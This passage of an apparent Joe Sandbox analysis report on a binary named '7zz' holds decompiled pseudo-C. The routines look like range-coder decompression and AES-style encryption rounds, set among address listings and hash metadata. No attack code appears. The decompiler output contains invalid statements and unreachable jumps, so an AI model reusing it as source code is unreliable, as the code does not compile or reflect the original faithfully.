							if(__eflags == 0) {
								break;
							}
							__ebp = __ebp + __ecx;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								continue;
							} else {
								__ecx = __ecx | 0xffffffff;
								__eflags = __ecx;
								do {
									 *(__esp + 0x1c + __eax * 4) = __ecx;
									 *(__esp + 0x20 + __eax * 4) = __ecx;
									 *(__esp + 0x24 + __eax * 4) = __ecx;
									 *(__esp + 0x28 + __eax * 4) = __ecx;
									 *(__esp + 0x2c + __eax * 4) = __ecx;
									 *(__esp + 0x30 + __eax * 4) = __ecx;
									 *(__esp + 0x34 + __eax * 4) = __ecx;
									 *(__esp + 0x38 + __eax * 4) = __ecx;
									__eax = __eax + 8;
									__eflags = __eax - 0x40;
								} while (__eax < 0x40);
								__eax =  *__edi & 0x000000ff;
								 *((char*)(__esp + ( *__edi & 0x000000ff) + 0x1c)) = 0;
								__eax = __ebx;
								do {
									__ecx =  *(__edi - 6) & 0x000000ff;
									__edi = __edi - 6;
									__eax = __eax - 1;
									__eflags = __eax;
									 *((char*)(__esp + __ecx + 0x1c)) = 0;
								} while (__eax != 0);
								__edi =  *(__edx + 2) & 0x0000ffff;
								__eax =  *(__esi + 0x48);
								__edx = 0;
								_t105 = __eax % __edi;
								__eax = __eax / __edi;
								__edx = _t105;
								__edi = __edi - __ebp;
								 *(__esi + 0x48) = __eax;
								__eax = __eax * __ebp;
								__edx =  *(__esi + 0x48);
								 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __eax;
								__edx =  *(__esi + 0x48) * (__edi - __ebp);
								 *(__esi + 0x48) =  *(__esi + 0x48) * (__edi - __ebp);
								__eax = E00466DF0(__esi);
								while(1) {
									L35:
									_t356 =  *( *_t396) & 0x000000ff;
									while(1) {
										_t396[3] =  &(_t396[3][1]);
										_t250 = ( *_t396)[8];
										__eflags = _t250;
										if(_t250 == 0) {
											break;
										}
										 *_t396 = _t250;
										__eflags = ( *_t250 & 0x000000ff) - _t356;
										if(( *_t250 & 0x000000ff) == _t356) {
											continue;
										} else {
											_t252 = E00466790(_t396, _t356, _t413 + 0x14);
											_t317 =  *_t396;
											 *(_t413 + 0x18) = _t252;
											_t253 = _t317[4];
											_t389 = 0;
											_t358 = ( *_t317 & 0x000000ff) + 1;
											while(1) {
												_t318 =  *_t253 & 0x000000ff;
												__eflags = _t318 -  *(_t413 + 0x10);
												if(_t318 ==  *(_t413 + 0x10)) {
													break;
												}
												_t389 = _t389 + (_t253[1] & 0x000000ff &  *(_t413 + _t318 + 0x1c));
												_t253 =  &(_t253[6]);
												_t358 = _t358 - 1;
												__eflags = _t358;
												 *(_t413 + _t318 + 0x1c) = 0;
												if(_t358 != 0) {
													continue;
												} else {
													_t330 =  *(_t413 + 0x14);
													_t265 = _t396[0x12] / (_t389 + _t330);
													_t396[0x14] = _t396[0x14] + _t265 * _t389;
													_t266 = _t265 * _t330;
													__eflags = _t266;
													_t396[0x12] = _t266;
													while(1) {
														_t369 = _t396[0x14];
														_t267 = _t396[0x12];
														__eflags = (_t369 + _t267 ^ _t369) - 0x1000000;
														if((_t369 + _t267 ^ _t369) < 0x1000000) {
															goto L45;
														}
														L43:
														__eflags = _t267 - 0x8000;
														if(_t267 < 0x8000) {
															_t273 =  ~_t369 & 0x00007fff;
															__eflags = _t273;
															_t396[0x12] = _t273;
															goto L45;
														}
														 *( *(_t413 + 0x18)) =  *( *(_t413 + 0x18)) +  *(_t413 + 0x14) + _t389;
														goto L35;
														L45:
														 *( *(_t396[0x15]))();
														_t396[0x12] = _t396[0x12] << 8;
														_t396[0x14] = _t396[0x14] << 8;
														_t369 = _t396[0x14];
														_t267 = _t396[0x12];
														__eflags = (_t369 + _t267 ^ _t369) - 0x1000000;
														if((_t369 + _t267 ^ _t369) < 0x1000000) {
															goto L45;
														}
														goto L43;
													}
												}
												goto L58;
											}
											_t294 = _t389;
											 *(_t413 + 0x10) = _t253;
											do {
												_t389 = _t389 + ( *(_t413 + ( *_t253 & 0x000000ff) + 0x1c) & _t253[1] & 0x000000ff);
												_t253 =  &(_t253[6]);
												_t358 = _t358 - 1;
												__eflags = _t358;
											} while (_t358 != 0);
											_t390 = _t389 +  *(_t413 + 0x14);
											_t255 = _t396[0x12] / (_t389 +  *(_t413 + 0x14));
											_t409 =  *(_t413 + 0x10);
											_t396[0x14] = _t396[0x14] + _t255 * _t294;
											_t396[0x12] = _t255 * (_t409[1] & 0x000000ff);
											while(1) {
												_t362 = _t396[0x14];
												_t257 = _t396[0x12];
												__eflags = (_t362 + _t257 ^ _t362) - 0x1000000;
												if((_t362 + _t257 ^ _t362) < 0x1000000) {
													goto L53;
												}
												__eflags = _t257 - 0x8000;
												if(_t257 < 0x8000) {
													_t263 =  ~_t362 & 0x00007fff;
													__eflags = _t263;
													_t396[0x12] = _t263;
													goto L53;
												}
												_t260 =  *(_t413 + 0x18);
												_t326 = _t260[1];
												__eflags = _t326 - 7;
												if(_t326 < 7) {
													_t235 =  &(_t260[1]);
													 *_t235 = _t260[1] - 1;
													__eflags =  *_t235;
													if( *_t235 == 0) {
														 *_t260 =  *_t260 << 1;
														_t328 = _t326 + 1;
														__eflags = _t328;
														_t260[1] = _t328;
														_t260[1] = 3 << _t326;
													}
												}
												_t396[2] = _t409;
												_t250 = E00466970(_t396, _t390);
												goto L58;
												L53:
												 *( *(_t396[0x15]))();
												_t396[0x12] = _t396[0x12] << 8;
												_t396[0x14] = _t396[0x14] << 8;
											}
										}
										break;
									}
									L58:
									return _t250;
									goto L59;
								}
							}
							goto L59;
						}
						__ebx =  *(__edx + 2) & 0x0000ffff;
						__eax =  *(__esi + 0x48);
						__edx = 0;
						_t116 = __eax % __ebx;
						__eax = __eax / __ebx;
						__edx = _t116;
						 *(__esi + 0x48) = __eax;
						__eax = __eax * __ebp;
						__edx =  *(__esi + 0x48);
						 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __eax;
						__edx =  *(__esi + 0x48) * __ecx;
						 *(__esi + 0x48) =  *(__esi + 0x48) * __ecx;
						__eax = E00466DF0(__esi);
						 *(__esi + 8) = __edi;
						_pop(__edi);
						__ecx = __esi;
						_pop(__esi);
						_pop(__ebp);
						_pop(__ebx);
						__esp = __esp + 0x10c;
						_push(_t396);
						_t402 = _t302;
						_t285 = _t402[2];
						 *((intOrPtr*)(_t285 + 1)) =  *((intOrPtr*)(_t285 + 1)) + 4;
						 *((intOrPtr*)( *_t402 + 2)) =  *((intOrPtr*)( *_t402 + 2)) + 4;
						if( *((intOrPtr*)(_t285 + 1)) >  *((intOrPtr*)(_t285 - 5))) {
							_t346 = _t285 - 6;
							_push(_t292);
							_push(_t379);
							 *_t285 =  *_t346;
							 *((short*)(_t285 + 4)) =  *((intOrPtr*)(_t346 + 4));
							 *_t346 =  *_t285;
							 *((short*)(_t346 + 4)) =  *((intOrPtr*)(_t285 + 4));
							_t402[2] = _t346;
							if( *((char*)(_t346 + 1)) > 0x7c) {
								E00466580(_t402);
							}
						}
						_t288 = ( *(_t402[2] + 4) & 0x0000ffff) << 0x00000010 |  *(_t402[2] + 2) & 0x0000ffff;
						if(_t402[3] != 0 || _t288 < _t402[0xf]) {
							E004661F0(_t402);
							_t290 = _t402[1];
							 *_t402 = _t290;
							return _t290;
						} else {
							_t402[1] = _t288;
							 *_t402 = _t288;
							return _t288;
						}
					} else {
						__ebx =  *(__eax + 2) & 0x0000ffff;
						__eax =  *(__esi + 0x48);
						__edx = 0;
						_t62 = __eax % __ebx;
						__eax = __eax / __ebx;
						__edx = _t62;
						__ecx =  *(__edi + 1) & 0x000000ff;
						 *(__esi + 0x48) = __eax;
						__eax = E00466DF0(__esi);
						 *(__esi + 8) = __edi;
						_pop(__edi);
						__ecx = __esi;
						_pop(__esi);
						_pop(__ebp);
						_pop(__ebx);
						__esp = __esp + 0x10c;
						_push(__ebx);
						_push(__esi);
						__esi = __ecx;
						__ecx =  *(__esi + 8);
						__edx =  *( *(__esi + 8) + 1) & 0x000000ff;
						__eax =  *__esi;
						__ecx =  *(__eax + 2) & 0x0000ffff;
						__ebx = 0;
						__edx = ( *( *(__esi + 8) + 1) & 0x000000ff) + ( *( *(__esi + 8) + 1) & 0x000000ff);
						__eflags = ( *( *(__esi + 8) + 1) & 0x000000ff) + ( *( *(__esi + 8) + 1) & 0x000000ff) - ( *(__eax + 2) & 0x0000ffff);
						__ebx = 0 | __eflags >= 0x00000000;
						__ecx = __eflags >= 0;
						 *((intOrPtr*)(__esi + 0x1c)) =  *((intOrPtr*)(__esi + 0x1c)) + __ecx;
						 *(__esi + 0x14) = __ecx;
						 *(__eax + 2) =  *(__eax + 2) + 4;
						__eax =  *(__esi + 8);
						 *(__eax + 1) & 0x000000ff = ( *(__eax + 1) & 0x000000ff) + 4;
						 *(__eax + 1) = __cl;
						__eflags = __cl - 0x7c;
						if(__cl > 0x7c) {
							__edi = __esi;
							__eax = E00466580(__esi);
							__edi = __edi;
						}
						__ecx =  *(__esi + 8);
						__eax =  *(__ecx + 4) & 0x0000ffff;
						__edx =  *(__ecx + 2) & 0x0000ffff;
						__eax = ( *(__ecx + 4) & 0x0000ffff) << 0x10;
						__eax = ( *(__ecx + 4) & 0x0000ffff) << 0x00000010 |  *(__ecx + 2) & 0x0000ffff;
						__eflags =  *(__esi + 0xc);
						if( *(__esi + 0xc) != 0) {
							L14:
							__eax = E004661F0(__esi);
							__eax =  *(__esi + 4);
							 *__esi = __eax;
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							__eflags = __eax -  *((intOrPtr*)(__esi + 0x3c));
							if(__eax <  *((intOrPtr*)(__esi + 0x3c))) {
								goto L14;
							} else {
								 *(__esi + 4) = __eax;
								 *__esi = __eax;
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						}
					}
				}
				L59:
			}

0x00466e30
0x00466e30
0x00466e39
0x00466e3b
0x00466e41
0x00466e45
0x00466f80
0x00466f8c
0x00466f93
0x00466f95
0x00466fd0
0x00466fd6
0x00466fde
0x00466feb
0x00466fee
0x00466ff6
0x00466ff9
0x00466ffc
0x00467001
0x0046700e
0x00467011
0x00467013
0x00467020
0x00467020
0x00467024
0x00467028
0x0046702c
0x00467030
0x00467034
0x00467038
0x0046703c
0x00467040
0x00467043
0x00467043
0x0046704c
0x00467051
0x00000000
0x00466f97
0x00466fa3
0x00466fa6
0x00466fae
0x00466fb1
0x00466fb9
0x00466fbd
0x00466fc0
0x00466fc2
0x00466921
0x00466923
0x00466926
0x00466929
0x00466931
0x0046693c
0x0046693f
0x0046694d
0x0046694f
0x00466953
0x00466961
0x00466961
0x00466969
0x0046696c
0x00466955
0x00466955
0x00466958
0x00000000
0x0046695a
0x0046695a
0x0046695d
0x00466960
0x00466960
0x00466958
0x00466953
0x00466e4b
0x00466e4b
0x00466e4e
0x00466e51
0x00466e53
0x00466e83
0x00466e85
0x00466e8c
0x00466e8f
0x00466e93
0x00466e95
0x00466e95
0x00466e99
0x00466e9c
0x00466ea0
0x00466ea4
0x00000000
0x00000000
0x00466ea6
0x00466ea8
0x00466ea8
0x00466ea9
0x00000000
0x00466eab
0x00466eab
0x00466eab
0x00466eb0
0x00466eb0
0x00466eb4
0x00466eb8
0x00466ebc
0x00466ec0
0x00466ec4
0x00466ec8
0x00466ecc
0x00466ed0
0x00466ed3
0x00466ed3
0x00466ed8
0x00466edb
0x00466ee0
0x00466ee2
0x00466ee2
0x00466ee6
0x00466ee9
0x00466ee9
0x00466eea
0x00466eea
0x00466ef1
0x00466ef5
0x00466ef8
0x00466efa
0x00466efa
0x00466efa
0x00466efe
0x00466f00
0x00466f03
0x00466f06
0x00466f09
0x00466f0c
0x00466f0f
0x00466f12
0x00467058
0x00467058
0x0046705a
0x00467060
0x00467060
0x00467065
0x00467068
0x0046706a
0x00000000
0x00000000
0x00467070
0x00467075
0x00467077
0x00000000
0x00467079
0x00467080
0x00467085
0x0046708a
0x0046708e
0x00467091
0x00467093
0x004670a0
0x004670a0
0x004670a3
0x004670a7
0x00000000
0x00000000
0x004670bc
0x004670be
0x004670c1
0x004670c1
0x004670c2
0x004670c5
0x00000000
0x004670c7
0x004670c7
0x004670d1
0x004670d8
0x004670db
0x004670db
0x004670de
0x004670e1
0x004670e1
0x004670e4
0x004670ec
0x004670f2
0x00000000
0x00000000
0x004670f4
0x004670f4
0x004670f9
0x004670ff
0x004670ff
0x00467104
0x00000000
0x00467104
0x00467125
0x00000000
0x00467107
0x0046710f
0x00467111
0x00467115
0x004670e1
0x004670e4
0x004670ec
0x004670f2
0x00000000
0x00000000
0x00000000
0x004670f2
0x004670e1
0x00000000
0x004670c5
0x0046712d
0x0046712f
0x00467133
0x00467141
0x00467143
0x00467146
0x00467146
0x00467146
0x00467149
0x00467150
0x00467152
0x0046715f
0x00467165
0x00467170
0x00467170
0x00467173
0x0046717b
0x00467181
0x00000000
0x00000000
0x00467183
0x00467188
0x0046718e
0x0046718e
0x00467193
0x00000000
0x00467193
0x004671aa
0x004671ae
0x004671b1
0x004671b4
0x004671b6
0x004671b6
0x004671b6
0x004671b9
0x004671bb
0x004671c2
0x004671c2
0x004671c4
0x004671c7
0x004671c7
0x004671b9
0x004671cc
0x004671cf
0x00000000
0x00467196
0x0046719e
0x004671a0
0x004671a4
0x004671a4
0x00467170
0x00000000
0x00467077
0x004671d4
0x004671de
0x00000000
0x004671de
0x00467058
0x00000000
0x00466ea9
0x00466f1c
0x00466f20
0x00466f23
0x00466f25
0x00466f25
0x00466f25
0x00466f27
0x00466f2a
0x00466f2d
0x00466f30
0x00466f33
0x00466f36
0x00466f39
0x00466f3e
0x00466f41
0x00466f42
0x00466f44
0x00466f45
0x00466f46
0x00466f47
0x00466820
0x00466821
0x00466823
0x0046682b
0x00466830
0x0046683a
0x0046683e
0x00466841
0x00466844
0x00466849
0x0046684f
0x00466853
0x00466855
0x00466859
0x00466860
0x00466864
0x00466864
0x0046686a
0x00466879
0x0046687f
0x0046688d
0x00466892
0x00466895
0x00466898
0x00466886
0x00466886
0x00466889
0x0046688c
0x0046688c
0x00466e55
0x00466e55
0x00466e59
0x00466e5c
0x00466e5e
0x00466e5e
0x00466e5e
0x00466e60
0x00466e67
0x00466e6a
0x00466e6f
0x00466e72
0x00466e73
0x00466e75
0x00466e76
0x00466e77
0x00466e78
0x004668a0
0x004668a1
0x004668a2
0x004668a4
0x004668a7
0x004668ab
0x004668ad
0x004668b1
0x004668b3
0x004668b5
0x004668b7
0x004668ba
0x004668bc
0x004668bf
0x004668c2
0x004668c7
0x004668ce
0x004668d1
0x004668d4
0x004668d7
0x004668da
0x004668dc
0x004668e1
0x004668e1
0x004668e2
0x004668e5
0x004668e9
0x004668ed
0x004668f0
0x004668f2
0x004668f6
0x00466905
0x00466905
0x0046690a
0x0046690d
0x0046690f
0x00466910
0x00466911
0x004668f8
0x004668f8
0x004668fb
0x00000000
0x004668fd
0x004668fd
0x00466900
0x00466902
0x00466903
0x00466904
0x00466904
0x004668fb
0x004668f6
0x00466e53
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55919b5aef1fa672d30966e0c4461599b635d46d04c924c9e983bb8ba431358
Instruction ID: 2116c1619d0707e95bcb97f7fad07b012c132014ac60db8612d006e7185b6878
Opcode Fuzzy Hash: c55919b5aef1fa672d30966e0c4461599b635d46d04c924c9e983bb8ba431358
Instruction Fuzzy Hash: 98C1E2716087518FC328CF2DD490126FBE2AF89304F298A6FE1D687791D339E545CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0046A460 Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0046A460(intOrPtr* __eax, signed int* __ecx) {
				signed int* _t169;
				unsigned int _t171;
				unsigned int _t178;
				unsigned int _t213;
				signed int* _t254;
				unsigned int _t262;
				unsigned int _t266;
				unsigned int _t273;
				unsigned int _t284;
				unsigned int _t289;
				signed int _t365;
				unsigned int _t375;
				unsigned int _t385;
				signed int _t409;
				void* _t437;

				_t171 =  *(__eax + 0x1c) ^ __ecx[3];
				_t266 =  *(__eax + 0x14) ^ __ecx[1];
				 *((intOrPtr*)(_t437 + 0xc)) =  *__eax;
				_t213 =  *(__eax + 0x18) ^ __ecx[2];
				_t289 =  *(__eax + 0x10) ^  *__ecx;
				 *(_t437 + 0x2c) = _t266;
				 *(_t437 + 0x14) = _t266 >> 0x00000008 & 0x000000ff;
				 *(_t437 + 0x28) = _t289;
				_t375 =  *(0x491968 + (_t171 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t266 >> 0x18) * 4) ^  *(0x491568 + (_t213 & 0x000000ff) * 4) ^  *(__eax + 0x28);
				_t273 =  *(0x491d68 + (_t213 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + (_t171 >> 0x18) * 4) ^  *(0x491568 + (_t289 & 0x000000ff) * 4) ^  *(__eax + 0x20);
				_t169 = __eax + 0x20;
				_t409 =  *(0x491d68 + ( *(_t437 + 0x2c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t289 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t213 >> 0x18) * 4) ^  *(0x491568 + (_t171 & 0x000000ff) * 4) ^ _t169[3];
				_t178 =  *(0x491d68 + (_t171 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t213 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + ( *(_t437 + 0x28) >> 0x18) * 4) ^  *(0x491568 + ( *(_t437 + 0x2c) & 0x000000ff) * 4) ^ _t169[1];
				_t52 = _t437 + 0x10;
				 *_t52 =  *((intOrPtr*)(_t437 + 0x10)) - 1;
				 *(_t437 + 0x20) = _t375;
				 *(_t437 + 0x18) = _t273;
				if( *_t52 != 0) {
					do {
						 *(_t437 + 0x14) = _t375 >> 0x00000010 & 0x000000ff;
						 *(_t437 + 0x14) = _t273 >> 0x00000008 & 0x000000ff;
						_t385 =  *(0x491968 + (_t178 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + (_t409 >> 0x18) * 4) ^  *(0x491568 + (_t273 & 0x000000ff) * 4) ^ _t169[4];
						_t284 =  *(0x491d68 + (_t178 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + ( *(_t437 + 0x20) >> 0x18) * 4) ^  *(0x491568 + (_t409 & 0x000000ff) * 4) ^ _t169[7];
						_t262 =  *(0x491968 + (_t409 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t273 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t178 >> 0x18) * 4) ^  *(0x491568 + (_t375 & 0x000000ff) * 4) ^ _t169[6];
						 *(_t437 + 0x14) =  *(_t437 + 0x20) >> 0x00000008 & 0x000000ff;
						_t365 =  *(0x491d68 + (_t409 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + ( *(_t437 + 0x18) >> 0x18) * 4) ^  *(0x491568 + (_t178 & 0x000000ff) * 4) ^ _t169[5];
						_t169 =  &(_t169[8]);
						 *(_t437 + 0x20) =  *(0x491968 + (_t284 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t385 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t365 >> 0x18) * 4) ^  *(0x491568 + (_t262 & 0x000000ff) * 4) ^ _t169[2];
						 *(_t437 + 0x18) =  *(0x491d68 + (_t262 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t365 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t284 >> 0x18) * 4) ^  *(0x491568 + (_t385 & 0x000000ff) * 4) ^  *_t169;
						_t409 =  *(0x491d68 + (_t365 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t385 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t262 >> 0x18) * 4) ^  *(0x491568 + (_t284 & 0x000000ff) * 4) ^ _t169[3];
						_t273 =  *(_t437 + 0x18);
						_t375 =  *(_t437 + 0x20);
						_t178 =  *(0x491d68 + (_t284 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t262 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t385 >> 0x18) * 4) ^  *(0x491568 + (_t365 & 0x000000ff) * 4) ^ _t169[1];
						_t140 = _t437 + 0x10;
						 *_t140 =  *((intOrPtr*)(_t437 + 0x10)) - 1;
					} while ( *_t140 != 0);
				}
				 *( *(_t437 + 0x3c)) = ((( *((_t375 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t409 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t178 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t273 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[4];
				( *(_t437 + 0x3c))[1] = ((( *((_t409 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t273 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t375 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t178 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[5];
				_t254 =  *(_t437 + 0x3c);
				_t254[2] = ((( *((_t273 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t178 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t409 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t375 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[6];
				_t254[3] = ((( *((_t178 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t375 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t273 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t409 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[7];
				return _t169;
			}

0x0046a46e
0x0046a471
0x0046a476
0x0046a47d
0x0046a484
0x0046a4c5
0x0046a4dd
0x0046a515
0x0046a529
0x0046a52c
0x0046a57c
0x0046a599
0x0046a59c
0x0046a59f
0x0046a59f
0x0046a5a3
0x0046a5a7
0x0046a5ab
0x0046a5b1
0x0046a604
0x0046a649
0x0046a66f
0x0046a683
0x0046a68f
0x0046a69b
0x0046a6ce
0x0046a70e
0x0046a714
0x0046a75e
0x0046a7a8
0x0046a7b1
0x0046a7cf
0x0046a7e0
0x0046a7e3
0x0046a7e3
0x0046a7e3
0x0046a5b1
0x0046a842
0x0046a899
0x0046a8ed
0x0046a8f1
0x0046a93d
0x0046a947

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d85033acdc5af3603231ca3bb88f19969520e1c4114c2203dc3061eb624cb0d
Instruction ID: 75d05c7fad47a1a52beca39c83a488ef50f93caae19ee7ec22463264903e5419
Opcode Fuzzy Hash: 9d85033acdc5af3603231ca3bb88f19969520e1c4114c2203dc3061eb624cb0d
Instruction Fuzzy Hash: 01D1BB728147A74FE318DF5DDC902357762AFD8250F0B063AC7951B2A2CB34BA11DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0046A950 Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0046A950(signed int* __eax, signed int* __ecx) {
				signed int* _t170;
				signed int* _t171;
				unsigned int _t173;
				unsigned int _t180;
				signed int _t213;
				signed int _t214;
				unsigned int _t216;
				signed int* _t257;
				unsigned int _t265;
				unsigned int _t269;
				unsigned int _t283;
				unsigned int _t294;
				unsigned int _t299;
				signed int _t375;
				unsigned int _t385;
				unsigned int _t395;
				signed int _t411;
				void* _t439;

				_t213 =  *__eax;
				 *(_t439 + 0xc) = _t213;
				_t214 = _t213 << 5;
				_t173 =  *(__eax + _t214 + 0x1c) ^ __ecx[3];
				_t269 =  *(__eax + _t214 + 0x18) ^ __ecx[2];
				_t170 = __eax + _t214 + 0x10;
				_t216 =  *_t170 ^  *__ecx;
				 *(_t439 + 0x2c) = _t269;
				_t299 = _t170[1] ^ __ecx[1];
				 *(_t439 + 0x2c) = _t299;
				_t385 =  *(0x492968 + (_t173 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 + (_t269 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x493168 + (_t299 >> 0x18) * 4) ^  *(0x492568 + (_t216 & 0x000000ff) * 4) ^  *(_t170 - 0x10);
				_t283 =  *(0x492968 + (_t299 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 + (_t216 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x493168 + (_t173 >> 0x18) * 4) ^  *(0x492568 + ( *(_t439 + 0x30) & 0x000000ff) * 4) ^  *(_t170 - 8);
				_t171 = _t170 - 0x20;
				_t411 =  *(0x492968 + ( *(_t439 + 0x30) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 + (_t299 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x493168 + (_t216 >> 0x18) * 4) ^  *(0x492568 + (_t173 & 0x000000ff) * 4) ^ _t171[7];
				_t180 =  *(0x492d68 + (_t173 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492968 + (_t216 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x493168 + ( *(_t439 + 0x30) >> 0x18) * 4) ^  *(0x492568 + ( *(_t439 + 0x2c) & 0x000000ff) * 4) ^ _t171[5];
				_t54 = _t439 + 0x10;
				 *_t54 =  *((intOrPtr*)(_t439 + 0x10)) - 1;
				 *(_t439 + 0x18) = _t385;
				 *(_t439 + 0x20) = _t283;
				if( *_t54 != 0) {
					do {
						 *(_t439 + 0x14) = _t385 >> 0x00000010 & 0x000000ff;
						 *(_t439 + 0x14) = _t283 >> 0x00000008 & 0x000000ff;
						_t395 =  *(0x492968 + (_t180 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 +  *(_t439 + 0x14) * 4) ^  *(0x493168 + (_t411 >> 0x18) * 4) ^  *(0x492568 + (_t283 & 0x000000ff) * 4) ^ _t171[2];
						_t294 =  *(0x492d68 + (_t180 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492968 +  *(_t439 + 0x14) * 4) ^  *(0x493168 + ( *(_t439 + 0x18) >> 0x18) * 4) ^  *(0x492568 + (_t411 & 0x000000ff) * 4) ^ _t171[3];
						_t265 =  *(0x492968 + (_t411 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 + (_t283 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x493168 + (_t180 >> 0x18) * 4) ^  *(0x492568 + (_t385 & 0x000000ff) * 4) ^  *_t171;
						 *(_t439 + 0x14) =  *(_t439 + 0x18) >> 0x00000008 & 0x000000ff;
						_t375 =  *(0x492d68 + (_t411 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492968 +  *(_t439 + 0x14) * 4) ^  *(0x493168 + ( *(_t439 + 0x20) >> 0x18) * 4) ^  *(0x492568 + (_t180 & 0x000000ff) * 4) ^ _t171[1];
						_t171 = _t171 - 0x20;
